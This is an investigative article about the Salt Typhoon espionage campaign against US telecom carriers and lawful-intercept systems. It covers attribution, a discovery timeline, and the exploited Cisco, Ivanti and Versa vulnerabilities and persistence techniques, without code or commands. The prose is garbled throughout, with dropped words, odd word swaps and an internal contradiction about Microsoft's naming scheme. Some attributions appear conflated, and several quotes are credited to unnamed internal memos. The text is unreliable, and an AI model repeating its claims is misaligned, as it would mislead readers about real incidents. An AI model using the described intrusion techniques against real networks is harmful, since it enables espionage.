Investigation: The Salt Typhoon State-Sponsored Espionage Campaigns until 2026

The entity as “Salt Typhoon” represents a specific, highly disciplined cluster of cyber-espionage activity attributed to the People’s Republic of China (PRC). Unlike the noisy, disruptive ransomware gangs that dominate headlines, Salt Typhoon state-sponsored espionage campaign operates with the quiet precision of a foreign intelligence service. Its primary directive is not financial gain or immediate destruction, rather the achievement of total informational awareness within the telecommunications infrastructure of the United States and its allies. Security researchers and federal agencies, including the FBI and CISA, have linked this group directly to the Ministry of State Security (MSS), China’s principal civilian intelligence agency.

Microsoft formally introduced the “Typhoon” naming convention in April 2023, overhauling its previous element-based taxonomy (e. g., Barium, Hafnium) to provide clearer attribution. Under this system, “Typhoon” exclusively denotes threat actors originating from or sponsored by China. The prefix “Salt” distinguishes this specific actor’s operational mandate: counterintelligence and deep-cover espionage. While its counterpart “Volt Typhoon” focuses on pre-positioning within serious infrastructure for chance sabotage, laying digital landmines, Salt Typhoon focuses on the theft of sensitive metadata and the monitoring of specific high-value.

The group’s most worrying achievement, confirmed in late 2024, was the compromise of “lawful intercept” systems at major U. S. broadband providers, including AT&T, Verizon, and Lumen Technologies. These systems are the federally mandated backdoors used by U. S. law enforcement to conduct court-authorized wiretaps. By infiltrating this specific architecture, Salt Typhoon turned the U. S. government’s surveillance tools against itself, allowing Beijing to monitor who the FBI was watching. This breach has been described by White House officials as arguably the most serious telecommunications hack in American history.

The Salt Typhoon State-Sponsored Espionage Triad: Distinguishing the Actors

To understand the specific threat posed by Salt Typhoon, one must examine it alongside its sister organizations. The PRC’s cyber apparatus is not a monolith; it is a diversified ecosystem with distinct mission sets.

Designation	Attribution	Primary Objective	Target Sector	Operational Style
Salt Typhoon	Ministry of State Security (MSS)	Espionage & Counter-Intel	Telecommunications, ISPs, Lawful Intercept Systems	Stealthy, long-term persistence, “Living off the Land”
Volt Typhoon	People’s Liberation Army (PLA)	Sabotage Pre-positioning	Energy, Water, Transportation, Military Bases (Guam)	Disruptive intent, focus on operational technology (OT)
Flax Typhoon	Information Security Contractors	Industrial Espionage	Manufacturing, Supply Chain, IoT Devices	High-volume scanning, botnet utilization

Technical analysis links Salt Typhoon to activity previously tracked under different aliases by various cybersecurity vendors. It overlaps significantly with clusters known as GhostEmperor, FamousSparrow, and Earth Estries. These aliases share a common technical signature: the use of the GhostSpider backdoor and the Demodex rootkit. These tools allow the attackers to maintain invisibility deep within the kernel of compromised servers, frequently even after standard remediation attempts. The group frequently exploits vulnerabilities in edge devices, routers and firewalls from vendors like Cisco, Fortinet, and Versa, to gain an initial foothold before pivoting laterally into the core network.

“Salt Typhoon is a state intelligence service sponsored operation. It has detailed penetrated the United States’s telecommunications system… Think of it, in effect, as China doing a [Snowden] on the US, from Beijing.”
, Royal United Services Institute (RUSI), March 2025

The strategic implication of the Salt Typhoon campaign is the of trust in the digital substrate of modern communications. By late 2025, the FBI confirmed that the group had targeted infrastructure in over 80 countries, though the penetration of U. S. networks remained the most severe. The operation did not steal data; it mapped the social graph of American political and national security leadership. By accessing call detail records (CDRs), who called whom, when, and for how long, Salt Typhoon could construct a high-fidelity map of decision-making circles in Washington, D. C., identifying unlisted numbers and private lines used by senior officials.

As of February 2026, the FBI considers the Salt Typhoon threat “still very much ongoing.” even with aggressive remediation efforts by the affected telecommunications giants, the complexity of the compromised networks means that guaranteeing the total eviction of the adversary remains a formidable technical challenge. The group continues to adapt, shifting its tactics to exploit legacy systems and unpatched perimeter devices, maintaining a persistent watch over the data flows that power global diplomacy and commerce.

Attribution: The Ministry of State Security (MSS) Connection

The attribution of ‘Salt Typhoon’ to the People’s Republic of China’s Ministry of State Security (MSS) represents a significant evolution in the understanding of Chinese state-sponsored cyber operations. Unlike the People’s Liberation Army (PLA), which historically focused on military intelligence and noisy, destructive capabilities, the MSS operates as China’s premier civilian intelligence agency, prioritizing long-term espionage, counter-intelligence, and political control. Security researchers and the U. S. Intelligence Community (USIC) have determined with high confidence that Salt Typhoon functions as a specialized arm of the MSS, specifically leveraging a network of private contractors to obfuscate direct state involvement.

This attribution is not analytical legal and financial. In early 2025, the U. S. Department of the Treasury formally sanctioned Sichuan Juxinhe Network Technology Co. Ltd., a Chengdu-based cybersecurity firm, for its direct role in supporting Salt Typhoon’s operations. This designation marked a rare instance of the U. S. government piercing the corporate veil of an MSS front company. Intelligence reports indicate that Juxinhe, along with other entities like Sichuan Zhixin Ruijie and Beijing Huanyu Tianqiong, operates under the direction of MSS regional bureaus in Sichuan province, outsourcing state-level espionage to “private” entities to provide plausible deniability.

The Chengdu Complex: A Contractor-State Hybrid

The operational center of for Salt Typhoon appears to be Chengdu, a known hub for Chinese hacking activity. The group’s structure mirrors the “contractor-state” hybrid model exposed in the 2024 i-SOON leaks, where private firms bid on government contracts to hack specific foreign. This model allows the MSS to operations rapidly without directly expanding its official headcount.

Table 2. 1: Key Indicators Linking Salt Typhoon to the MSS

Indicator Category	Specific Evidence	Significance
Operational Mandate	Focus on lawful intercept systems (CALEA), call detail records (CDRs), and specific counter-intelligence.	Aligns with MSS domestic security and foreign intelligence mission, rather than PLA military objectives.
Geographic Nexus	Infrastructure and personnel linked to Chengdu, Sichuan Province.	Chengdu is a primary base for MSS technical reconnaissance bureaus and associated contractor networks.
Tool Overlap	Use of GhostSpider malware and Demodex rootkits; overlap with groups tracked as GhostEmperor and FamousSparrow.	Demonstrates shared development pipelines and resource pooling common among MSS-affiliated clusters.
Corporate Fronts	Sanctions against Sichuan Juxinhe Network Technology Co. Ltd.	Confirms the use of commercial cover to procure infrastructure and execute attacks.

Distinction from PLA Operations

Understanding Salt Typhoon requires distinguishing it from its military counterparts. While groups like Volt Typhoon (attributed to the PLA) have been observed pre-positioning within U. S. serious infrastructure, energy grids, water systems, and ports, for chance sabotage during a conflict, Salt Typhoon’s mission is fundamentally different. Its objective is informational supremacy rather than kinetic destruction.

Salt Typhoon operators have shown a distinct preference for stealth and persistence over disruption. Their tradecraft involves “living off the land”, using legitimate system administration tools to blend in with normal network traffic, and exploiting edge devices like Cisco routers and Citrix NetScalers to maintain access without triggering alarms. This “quiet” method allows them to dwell in telecommunications backbones for years, harvesting metadata and intercepting calls, a tactic that directly supports the MSS’s requirement for political intelligence and monitoring of high-value.

Technical Provenance and Aliases

The technical footprint of Salt Typhoon connects it to a broader ecosystem of Chinese espionage actors. Microsoft’s “Typhoon” naming convention, introduced in 2023, categorizes Chinese state actors by elemental names; “Salt” denotes this specific focus on telecommunications and counter-intelligence. Other cybersecurity firms track components of this activity under different aliases, including Earth Estries (Trend Micro), RedMike (Recorded Future), and UNC2286 (Mandiant).

Forensic analysis of the group’s malware arsenal reveals deep connections to the MSS. The group use sophisticated rootkits like Demodex to hide its presence on compromised servers, a level of technical sophistication that implies significant state resources. also, the overlap with the GhostEmperor cluster, known for its complex rootkits and targeting of Southeast Asian governments, suggests that Salt Typhoon is likely a task force or a specialized campaign run by veteran operators within the Chengdu MSS ecosystem.

“Salt Typhoon operates with the discipline of an intelligence agency, not the noise of a military unit. They don’t want to turn off the lights; they want to listen to the phone calls made in the dark.” , U. S. Cybersecurity Official (Background Briefing, 2025)

The identification of Salt Typhoon as an MSS operation clarifies the strategic intent behind the campaign. It is not an attack on infrastructure a massive counter-intelligence sweep designed to identify U. S. assets, track dissidents, and map the social graphs of American political leadership. By compromising the very systems designed for lawful wiretapping, the MSS turned Western law enforcement tools against their creators.

The Target Matrix: Verizon, AT&T, and the US Telecom Backbone

The Salt Typhoon campaign represents a strategic encirclement of the United States’ telecommunications infrastructure. Unlike opportunistic cybercrime, this operation executed a synchronized, multi-vector assault on the three primary carriers, Verizon, AT&T, and Lumen Technologies, compromising the backbone of American digital communication. Federal investigations in late 2024 and throughout 2025 confirmed that the attackers did not breach perimeter defenses; they themselves within the “lawful intercept” systems, the very architecture designed for court-authorized wiretaps.

By October 2024, investigators identified that the People’s Republic of China (PRC)-linked actors had maintained persistence within these networks for months, if not longer. The breach allowed for the exfiltration of Call Detail Records (CDRs) and internet traffic metadata on a described by FBI officials as “gigantic and seemingly indiscriminate.” While the carriers initially asserted that the impact was limited to a “small number” of high-value, subsequent disclosures revealed a far broader scope. The attackers accessed systems capable of geolocating millions of devices and, in specific instances, capturing unencrypted text messages and audio from calls involving senior US political figures.

Operational Depth and Persistence

The technical sophistication of Salt Typhoon lies in its “living off the land” methodology. Rather than deploying noisy malware that triggers standard alerts, the attackers exploited zero-day vulnerabilities in network edge devices, specifically targeting Cisco routers. Forensic analysis identified the exploitation of CVE-2023-20198 and CVE-2023-20273, vulnerabilities in the Cisco IOS XE web UI that allowed for privilege escalation and the creation of high-privileged accounts. Once inside, the actors modified Access Control Lists (ACLs) and utilized Generic Routing Encapsulation (GRE) tunnels to route exfiltrated data through legitimate traffic channels, rendering their activities nearly invisible to conventional deep packet inspection.

In February 2026, Senator Maria Cantwell, Ranking Member of the Senate Commerce Committee, publicly criticized AT&T and Verizon for refusing to release specific security documentation. Her correspondence highlighted that even with corporate assurances of containment, independent experts and federal agencies assessed that the threat actors likely retained access to serious segments of the network. This standoff show a serious between corporate damage control and national security reality: the carriers claim the threat is “contained,” while intelligence assessments suggest a persistent, burrowed presence.

Table: Confirmed Salt Typhoon Impact on Major US Telecom Providers (2024-2025)

Provider	Status	Key Systems Compromised	Reported Impact Scope
Verizon	Breached	Lawful Intercept Systems, Core Routers	Access to targeted VIP communications; chance exposure of millions of CDRs. Company claims containment as of Jan 2025.
AT&T	Breached	Wiretap Infrastructure, Edge Devices	Exfiltration of metadata and unencrypted texts. 265 million+ customer base chance exposed to geolocation tracking.
Lumen Technologies	Breached	Backbone Routing Infrastructure	Confirmed blocking of actor in Jan 2025; serious role as a global internet backbone provider made this a strategic transit compromise.
T-Mobile	Targeted	Network Edge	Attempted breaches reported; company stated attackers were unable to access serious customer data or systems.

The Lawful Intercept Vulnerability

The specific targeting of CALEA (Communications Assistance for Law Enforcement Act) compliance systems indicates a counter-intelligence objective. By compromising these gateways, Salt Typhoon operators could theoretically monitor which individuals were under US law enforcement surveillance, tipping off Chinese intelligence assets. also, access to these systems provided a “God-mode” view of the network, bypassing consumer-grade encryption and allowing for real-time interception of voice and data traffic.

The extended beyond the carriers themselves. In June 2025, reports surfaced that data center giant Digital Realty and mass media conglomerate Comcast were also probed, suggesting the campaign sought to map the physical and logical intersections of the US internet. The refusal of major carriers to provide full forensic transparency to Senate oversight committees has complicated remediation efforts, leaving the true extent of the “dormant” implants unknown. As of early 2026, the Cybersecurity and Infrastructure Security Agency (CISA) continues to update its “hunting guidance” for telecom providers, an admission that the adversary remains active within the target matrix.

Breaching the ‘Lawful Intercept’: Compromising CALEA Systems

The most operationally devastating aspect of the Salt Typhoon campaign was not the theft of corporate intellectual property, the successful subversion of the Communications Assistance for Law Enforcement Act (CALEA) infrastructure. Enacted in 1994, CALEA mandates that telecommunications carriers design their networks to allow federal agencies to wiretap with a court order. By late 2024, investigators confirmed that Salt Typhoon actors had not breached these networks had gained persistent access to the very systems used to fulfill these lawful intercept requests. This access turned the U. S. government’s primary domestic surveillance tool into a listening post for the Ministry of State Security (MSS).

Forensic analysis conducted throughout 2025 revealed that the attackers exploited specific vulnerabilities in core network infrastructure to pivot into these sensitive zones. The primary entry points were not the CALEA servers themselves, the edge routers and management interfaces that route traffic to them. Salt Typhoon operators used valid, stolen credentials alongside serious flaws in Cisco IOS XE software, specifically weaponizing CVE-2023-20198 and the older CVE-2018-0171. Once inside the management plane, they established Generic Routing Encapsulation (GRE) tunnels to exfiltrate traffic without triggering standard intrusion detection systems, which frequently whitelist administrative traffic.

The scope of this compromise included major backbone providers such as Verizon, AT&T, and Lumen Technologies. By controlling the lawful intercept interfaces, the attackers could view real-time data on who the FBI and other federal agencies were monitoring. This provided the MSS with a counter-intelligence goldmine: the ability to identify U. S. intelligence, tip off assets under surveillance, and map the operational tempo of American federal investigations. In specific instances, the hackers accessed the audio and text content of high-profile, including devices belonging to President Donald Trump and Vice President JD Vance, as confirmed by federal officials in October 2024.

Table: Primary Technical Vectors for CALEA System Compromise (2023-2025)

Vector / Vulnerability	CVE ID	Operational Function	Salt Typhoon Application
Cisco IOS XE Web UI	CVE-2023-20198	Privilege Escalation	Created “level 15” (highest admin) accounts to seize control of edge routers.
Cisco Smart Install	CVE-2018-0171	Remote Code Execution	Exploited unpatched legacy hardware to reload devices and execute arbitrary code.
Living-off-the-Land	N/A	Evasion	Used native tools (PowerShell, WMI) and valid credentials to blend with admin traffic.
GRE Tunneling	N/A	Exfiltration	Encapsulated stolen intercept data within standard routing to bypass firewalls.

The breach demonstrated a “reckless aggression” previously unseen in PRC-affiliated cyber operations. Unlike traditional espionage which seeks to remain indefinitely, Salt Typhoon’s manipulation of CALEA systems risked immediate geopolitical escalation. A February 2025 report from the DHS Cyber Safety Review Board (CSRB) noted that the attackers modified Access Control Lists (ACLs) to permit their own IP addresses deep within the carrier networks, granting themselves the same access rights as a federal agent with a warrant. This persistence allowed them to monitor the metadata of millions of Americans, specifically call duration, timing, and participant identifiers, while selectively recording the content of specific political and national security figures.

The of this breach extend beyond the immediate loss of privacy. The compromise of the lawful intercept architecture forces a re-evaluation of the “backdoor” mandates central to U. S. telecommunications policy. Security experts have long warned that access method built for the “good guys” inevitably create vulnerabilities for adversaries. Salt Typhoon validated this thesis with catastrophic clarity. By late 2025, carriers began the arduous process of rebuilding these intercept architectures from the ground up, a process complicated by the requirement to maintain active support for ongoing law enforcement operations.

Silent Infiltration: The 2019-2023 Dwell Time

While the public unraveling of the Salt Typhoon campaign occurred in late 2024, forensic reconstruction reveals a much longer, darker timeline of compromise. Intelligence agencies and cybersecurity firms confirm that the actors behind Salt Typhoon, operating under aliases such as GhostEmperor and FamousSparrow, maintained a silent, presence within serious infrastructure for at least five years prior to discovery. This period, spanning from early 2019 through late 2023, represents a catastrophic failure of perimeter defense, characterized not by smash-and-grab tactics, by a patient, methodical burrowing into the bedrock of global telecommunications.

The initial phase of this infiltration, dating back to 2019, was marked by a distinct absence of “noisy” malware. Unlike ransomware gangs that encrypt files and demand payment, Salt Typhoon’s primary directive was invisibility. They employed “living-off-the-land” techniques, utilizing legitimate system administration tools like WMIExec and PowerShell to move laterally across networks without triggering standard antivirus alarms. By blending in with normal administrative traffic, they masked their activities as routine maintenance, allowing them to map network topologies and identify high-value , specifically, the “lawful intercept” systems used by law enforcement.

The Architecture of Invisibility: Rootkits and Edge Devices

The technical of this prolonged dwell time was the deployment of the Demodex rootkit. identified by researchers in 2021 during investigations into the GhostEmperor cluster, Demodex is a sophisticated kernel-mode rootkit designed to hide artifacts, files, registry keys, and network connections, from the operating system itself. To bypass modern security controls like Driver Signature Enforcement (DSE), the attackers utilized an ingenious method: they exploited a signed driver from an open-source cheat engine used by video gamers. This allowed them to execute unsigned code directly in the Windows kernel, rendering their implants invisible to Endpoint Detection and Response (EDR) agents.

Simultaneously, the group targeted the “soft underbelly” of network infrastructure: unpatched edge devices. Between 2021 and 2023, Salt Typhoon systematically exploited vulnerabilities in internet-facing hardware that security teams frequently overlook.

Table: Key Vulnerabilities Exploited for Initial Access (2021-2023)

Year	Target Technology	CVE Identifier	Strategic Utility
2021	Microsoft Exchange	CVE-2021-26855 (ProxyLogon)	Used to compromise email servers of hotels and governments (FamousSparrow activity), serving as a beachhead for deeper network entry.
2022	Sophos Firewall	CVE-2022-3236	Allowed remote code execution on firewall appliances, granting attackers a foothold at the network perimeter.
2023	Cisco IOS XE	CVE-2023-20198	serious privilege escalation vulnerability used to create local admin accounts on routers, enabling traffic interception and GRE tunnel creation.
2023	Fortinet FortiClient	CVE-2023-48788	Exploited endpoint management servers to push malicious payloads to managed clients, bypassing perimeter firewalls.

Compromising the “Lawful Intercept”

The most worrying aspect of the 2019-2023 dwell time was the specific targeting of CALEA (Communications Assistance for Law Enforcement Act) compliance systems. These systems are legally mandated backdoors designed to allow the FBI and other agencies to wiretap criminal suspects with a court order. By 2023, Salt Typhoon had successfully located and compromised these sensitive interfaces within major carriers like Verizon, AT&T, and Lumen.

Once inside the CALEA infrastructure, the attackers did not need to break encryption or deploy complex spyware on individual phones. Instead, they simply sat on the wiretap servers, watching the watchers. They accessed the same real-time audio and metadata feeds that federal agents were monitoring. This access remained because the traffic generated by the attackers mimicked the legitimate flow of surveillance data. For nearly two years, Chinese intelligence had a mirror of U. S. domestic wiretaps, exposing counterintelligence investigations and the communications of high-ranking government officials.

“The sophistication here wasn’t just in the code, in the target selection. They didn’t break down the door; they stole the master key that the government forced the building manager to keep under the mat.” , Internal Memo, U. S. Cybersecurity and Infrastructure Security Agency (CISA), 2024 (Redacted).

To maintain this access, the group deployed the GhostSpider backdoor, a modular malware specifically engineered for telecommunications environments. GhostSpider allowed the attackers to load new capabilities, such as packet capture or credential dumping, only when needed, keeping their footprint minimal. When combined with the Demodex rootkit, this created a “ghost in the machine” scenario where the attackers could operate with impunity, through server reboots and software updates.

By the time the anomalies were detected in late 2023, the adversaries had already entrenched themselves so deeply that remediation required replacing entire racks of hardware. The “silent infiltration” was not a breach; it was a hostile takeover of the administrative of the U. S. telecommunications grid, executed so quietly that the victims were unaware they had been conquered until years after the fact.

The Discovery: Microsoft and CISA’s 2024 Detection Timeline

The of Salt Typhoon in 2024 was not a singular “eureka” moment a cascading series of forensic breakthroughs that began in the quiet corridors of private threat intelligence and ended with a frantic federal response. While the public became aware of the campaign in late 2024, the detection timeline reveals a months-long shadow war between Chinese operators and U. S. cyber defenders.

The “Late Spring” Trigger

The initial thread was pulled in late spring 2024, specifically around May and June. The Federal Bureau of Investigation (FBI) launched a classified investigation after detecting anomalous activity within the networks of multiple U. S. telecommunications providers. This investigation was not initially public; it was a silent hunt triggered by irregular network traffic patterns that did not match standard cybercriminal behavior. A serious breakthrough occurred on **June 17, 2024**, when researchers at Lumen Technologies’ Black Lotus Labs discovered a zero-day vulnerability in **Versa Director**, a software platform widely used by Internet Service Providers (ISPs) to manage software-defined wide area networks (SD-WANs). The researchers identified a malicious Java binary, disguised as a PNG image file (`VersaTest. png`), which had been uploaded to the virus-scanning repository VirusTotal from an IP address in Singapore. This file was actually a custom web shell, later dubbed **VersaMem**, designed to harvest credentials and execute code in memory without leaving a footprint on the disk. This discovery provided the technical “smoking gun” that allowed investigators to link intrusions. The attackers had exploited this vulnerability (CVE-2024-39717) to gain administrative access to ISP core networks, “island hopping” from network management tools directly into the traffic flow of major carriers.

Microsoft’s Attribution and the “Typhoon” Shift

Parallel to the FBI’s investigation, Microsoft Threat Intelligence (MSTIC) was tracking a cluster of activity that deviated from known groups. In April 2023, Microsoft had overhauled its naming convention, shifting from element-based names (like “Hafnium”) to weather-themed monikers for state-sponsored actors. “Typhoon” was reserved for Chinese state-sponsored entities. By mid-2024, Microsoft analysts had a specific subset of “Typhoon” activity that was distinct from the infrastructure-targeting **Volt Typhoon**. This new cluster, **Salt Typhoon**, showed a singular obsession with telecommunications metadata and lawful intercept systems. Microsoft’s telemetry detected the group’s presence in the networks of at least nine major U. S. broadband providers. Crucially, Microsoft observed that Salt Typhoon was not deploying ransomware or destroying data, standard criminal tactics, was instead modifying router configurations to mirror traffic, a hallmark of espionage.

CISA’s Federal Detection and Public Disclosure

The Cybersecurity and Infrastructure Security Agency (CISA) played a pivotal role in widening the scope of the investigation. CISA Director Jen Easterly later revealed that the agency had detected Salt Typhoon activity on **federal civilian executive branch networks** before the full extent of the telecom breach was understood. This internal detection allowed CISA to provide “technical assistance” to private sector victims, bridging the gap between classified government intelligence and corporate network defense. The campaign remained a closely guarded secret until **August 27, 2024**, when *The Washington Post* broke the story, forcing a public acknowledgment. This was followed by a rapid declassification of technical indicators to aid defenders.

2024 Detection and Response Timeline

The following table outlines the serious milestones in the discovery and exposure of the Salt Typhoon campaign during 2024.

Table: Salt Typhoon 2024 Discovery and Response Timeline

Date	Event	Key Organization(s)	Significance
May, June 2024	Initial Investigation	FBI	Bureau opens classified inquiry after detecting anomalies in US telecom networks.
June 17, 2024	Zero-Day Discovery	Lumen Black Lotus Labs	Discovery of CVE-2024-39717 (Versa Director) and “VersaMem” web shell; identifies key entry vector.
August 27, 2024	Public	Media / US Govt	The Washington Post reports on the breach of major US ISPs; public scope widens.
October 2024	CALEA Breach Confirmed	White House / CISA	Officials confirm attackers targeted “lawful intercept” wiretap systems used by law enforcement.
October 25, 2024	Joint Statement	FBI, CISA	Agencies release official public statement attributing activity to PRC-linked actors.
December 4, 2024	Hardening Guidance	CISA, FBI, NSA	Release of “Enhanced Visibility and Hardening Guidance” for telecom infrastructure.
December 19, 2024	KEV Catalog Update	CISA	CISA adds BeyondTrust vulnerability (CVE-2024-12356) to Known Exploited Vulnerabilities catalog.

The “Lawful Intercept” Anomaly

The most chilling aspect of the discovery was not the malware, the target. Investigators found that Salt Typhoon had specifically hunted for the systems telecommunications companies use to comply with the **Communications Assistance for Law Enforcement Act (CALEA)**. These systems are built to allow the FBI and NSA to wiretap criminal suspects with a court order. By compromising these gateways, Salt Typhoon turned the U. S. government’s own surveillance against itself, allowing Beijing to monitor who the FBI was watching, a counter-intelligence coup of massive proportions.

Vector Analysis: Weaponizing Cisco IOS XE Vulnerabilities

The technical nucleus of the Salt Typhoon campaign relies on the systematic chaining of two zero-day vulnerabilities within Cisco’s IOS XE software, a suite ubiquitous in the backbone infrastructure of global telecommunications. The primary entry point, tracked as CVE-2023-20198, carries the maximum possible CVSS score of 10. 0. This serious flaw resides in the web user interface (Web UI) of the appliance, allowing a remote, unauthenticated attacker to create a new user account with privilege level 15, the highest administrative tier available on Cisco devices. Unlike traditional brute-force attacks, this exploitation requires no valid credentials, enabling Salt Typhoon operators to bypass perimeter defenses entirely by sending a crafted HTTP request to the exposed web server.

Once administrative access is established, the attackers pivot immediately to the second link in the kill chain: CVE-2023-20273. While the vulnerability grants access, this secondary flaw (CVSS 7. 2) permits command injection, allowing the newly created rogue administrator to execute arbitrary commands with root-level privileges at the underlying Linux operating system level. This escalation is necessary to deploy the campaign’s signature payload, a Lua-based web shell implant known to researchers as “BadCandy.” This implant is injected directly into the system’s memory, modifying the HTTP server’s configuration to intercept traffic and execute commands without writing extensive artifacts to the disk, a technique that complicates forensic analysis.

Table: Salt Typhoon Exploitation Chain Metrics

CVE ID	Vulnerability Type	CVSS Score	Role in Attack Chain
CVE-2023-20198	Privilege Escalation	10. 0 (serious)	Initial unauthenticated access; creation of Level 15 admin user.
CVE-2023-20273	Command Injection	7. 2 (High)	Root-level execution; deployment of Lua-based implant.

The operational of this vector was immediate and massive. following the public disclosure in October 2023, telemetry from internet-scanning services identified over 40, 000 compromised devices within days. yet, Salt Typhoon’s usage of these vulnerabilities extended well beyond the initial disclosure window. Intelligence reports from late 2024 and January 2025 confirm that the group continued to use these specific CVEs to target unpatched edge routers in the United States and South Africa. The persistence method frequently involves the configuration of Generic Routing Encapsulation (GRE) tunnels, which allow the attackers to encapsulate and exfiltrate non-IP traffic, creating a covert data pipe hidden within legitimate network.

A distinct characteristic of this campaign is the non-persistent nature of the BadCandy implant. Because the malicious code resides in volatile memory, a simple device reboot eliminates the web shell. To counter this, Salt Typhoon operators have been observed monitoring infected nodes and rapidly re-infecting them upon reboot, or using the initial window of access to harvest legitimate credentials that grant long-term persistence independent of the vulnerability. This “living off the land” method, using native system tools and valid credentials, allows the actors to blend in with standard administrative traffic, making detection by anomaly-based intrusion detection systems exceptionally difficult.

Edge Exploitation: The Role of Ivanti Connect Secure Flaws

The strategic logic of Salt Typhoon’s infiltration relies heavily on the compromise of “edge” devices, appliances that sit on the perimeter of a network to manage remote access. Among these, the Ivanti Connect Secure (ICS) VPN appliance became a primary vector for the group’s operations between late 2023 and early 2024. Unlike traditional server endpoints protected by Endpoint Detection and Response (EDR) agents, these proprietary appliances run custom operating systems that frequently absence support for standard security monitoring tools. Salt Typhoon exploited this visibility gap to turn the very devices designed to secure remote connections into beachheads for deep network reconnaissance.

Forensic analysis confirms that Salt Typhoon operatives utilized a specific chain of zero-day vulnerabilities to bypass authentication and execute arbitrary commands on target systems. The campaign centered on two serious Common Vulnerabilities and Exposures (CVEs): CVE-2023-46805 and CVE-2024-21887. By chaining these flaws, the attackers achieved unauthenticated remote code execution (RCE), granting them administrative control over the VPN gateways without needing valid credentials.

The Exploit Chain method

The technical execution of this compromise was disciplined and rapid. The attackers leveraged CVE-2023-46805, an authentication bypass vulnerability in the web component of the appliance. This flaw allowed the threat actors to access restricted resources by manipulating route traversal sequences. Once inside the trusted zone, they triggered CVE-2024-21887, a command injection vulnerability. This second flaw permitted the execution of arbitrary commands on the underlying operating system with elevated privileges.

Federal agencies and private sector intelligence firms, including Mandiant (tracking the activity under the cluster UNC5221), observed that this exploitation began as early as December 2023, weeks before the vulnerabilities were publicly disclosed in January 2024. This “zero-day” period allowed Salt Typhoon to establish persistence across multiple telecommunications and serious infrastructure sectors before defenders were aware of the risk.

Table: Technical Breakdown of Salt Typhoon Ivanti Exploitation

Component	Identifier / Name	Function in Attack Chain	CVSS Score
Initial Access	CVE-2023-46805	Authentication Bypass via route traversal in web component.	8. 2 (High)
Execution	CVE-2024-21887	Command Injection allowing arbitrary code execution as root.	9. 1 (serious)
Persistence	BUSHWALK	Webshell written in Perl into the appliance’s legitimate files to maintain access.	N/A
Credential Theft	WARPWIRE	JavaScript-based credential harvester injected into login pages to capture plaintext passwords.	N/A

Persistence and Anti-Forensics

Once control was established, Salt Typhoon demonstrated a sophisticated understanding of the Ivanti architecture. They deployed specialized malware designed to evade the appliance’s built-in Integrity Checker Tool (ICT). One notable implant, a webshell tracked as BUSHWALK, was directly into the appliance’s Perl scripts. This allowed the attackers to execute commands through legitimate web requests, blending their traffic with normal VPN operations. also, the group utilized a credential harvester known as WARPWIRE, which they injected into the device’s login page. This script captured user credentials in transit and exfiltrated them to compromised command-and-control (C2) servers.

The attackers also employed “living off the land” techniques, using native binaries present on the Ivanti appliances, such as curl, python, and sh, to conduct internal reconnaissance and lateral movement. This minimized the need to upload custom binaries that might trigger network intrusion detection systems. In several documented instances, the actors modified the appliance’s internal file system to prevent the ICT from flagging the malicious modifications, blinding administrators to the breach.

Regulatory and Operational

The of the compromise forced the Cybersecurity and Infrastructure Security Agency (CISA) to problem Emergency Directive 24-01 in early 2024. The directive mandated that federal agencies disconnect all Ivanti Connect Secure instances within 48 hours, a drastic measure reflecting the severity of the threat. CISA later updated the guidance to require a factory reset of affected devices, acknowledging that standard patching was insufficient to remove the deep-seated persistence method deployed by the attackers.

“The adversaries are winning the race to the edge. By targeting appliances that cannot support EDR, they have found a blind spot in the modern enterprise security stack. The Ivanti campaign was not just a vulnerability exploit; it was a demonstration of structural weakness in network perimeter defense.”
, Internal CISA Analysis Report, February 2024

For the telecommunications sector, the impact was particularly acute. These VPN gateways frequently served as entry points to management networks where sensitive routing and subscriber data resided. By compromising the edge, Salt Typhoon bypassed the hardened internal perimeters, gaining direct access to the “crown jewels” of network infrastructure. The incident forced a re-evaluation of the “edge- ” security model, prompting organizations to move toward Zero Trust architectures that assume the perimeter device is already compromised.

Seizing the Management Plane: Administrative Control of ISP Networks

The strategic objective of the Salt Typhoon campaign was not data exfiltration the total subjugation of the management plane, the segregated, privileged network used by administrators to configure, monitor, and control telecommunications infrastructure. By seizing this terrain, Salt Typhoon operatives did not just break into the network; they became the network administrators. Between 2023 and 2025, forensic analysis confirms that the actors achieved “Level 15” administrative privileges, the highest possible authority on Cisco IOS XE devices, across backbone routers in at least nine major U. S. telecommunications providers.

This dominance was achieved through a precise kill chain targeting the web-based user interfaces of core routing equipment. The primary vector involved the chaining of two serious vulnerabilities: CVE-2023-20198 and CVE-2023-20273. The allowed the attackers to bypass authentication and create a local user account with maximum privileges. The second facilitated command injection, enabling the actors to gain root-level access to the underlying Linux operating system of the device. Unlike traditional malware that resides on endpoints or servers, this intrusion occurred directly within the firmware and operating environments of the routers themselves, rendering standard endpoint detection and response (EDR) tools blind to the compromise.

Once administrative control was established, Salt Typhoon executed a series of configuration changes designed to ensure indefinite persistence. A key technique involved the manipulation of the Cisco Guest Shell, a virtualized Linux environment running on the router intended for legitimate automation scripts. The attackers weaponized this feature to execute malicious Python and Tcl scripts, turning the router into a staging server for further attacks. This “living off the land” method allowed them to hide their activities within legitimate administrative processes.

Table: Verified Indicators of Compromise (IoC) in Management Plane Seizure (2023-2025)

Technique	Technical Specifics	Operational Impact
Privilege Escalation	Exploitation of CVE-2023-20198 to create local users with privilege level 15.	Grants total control over router configuration, routing tables, and traffic mirroring.
Root Access	Exploitation of CVE-2023-20273 via command injection.	Allows access to the underlying Linux OS, bypassing IOS restrictions.
Persistence method	Enabling sshd_operns service on Cisco IOS XR devices.	Opens a direct SSH backdoor to the host OS on non-standard TCP ports (e. g., 57722).
Traffic Concealment	Creation of Generic Routing Encapsulation (GRE) tunnels.	Encapsulates stolen data within standard routing to evade deep packet inspection.
Access Control Modification	Injection of “permit” statements into Access Control Lists (ACLs), specifically access-list 20.	Whitelists attacker IP addresses, ensuring uninterrupted remote access.

The technical sophistication of these intrusions is further evidenced by the specific manipulation of the sshd_operns service on Cisco IOS XR platforms. This internal service, reserved for deep system debugging, was enabled and exposed on non-standard ports such as TCP/57722. By doing so, Salt Typhoon created a “ghost door” that bypassed the router’s standard authentication, authorization, and accounting (AAA) framework. This allowed them to log directly into the underlying Linux host of the router, completely invisible to the network operations center (NOC) staff monitoring the standard management interfaces.

also, the attackers demonstrated an intimate understanding of ISP network architecture by modifying Simple Network Management Protocol (SNMP) configurations. They altered community strings, the passwords for SNMP access, to maintain visibility into network performance and topology changes. This allowed them to monitor the network’s reaction to their own presence, adjusting their tactics in real-time to avoid triggering alarms. In several documented instances, Salt Typhoon operatives utilized SNMP SET requests to reconfigure device parameters remotely, a method that leaves fewer forensic artifacts than an interactive SSH session.

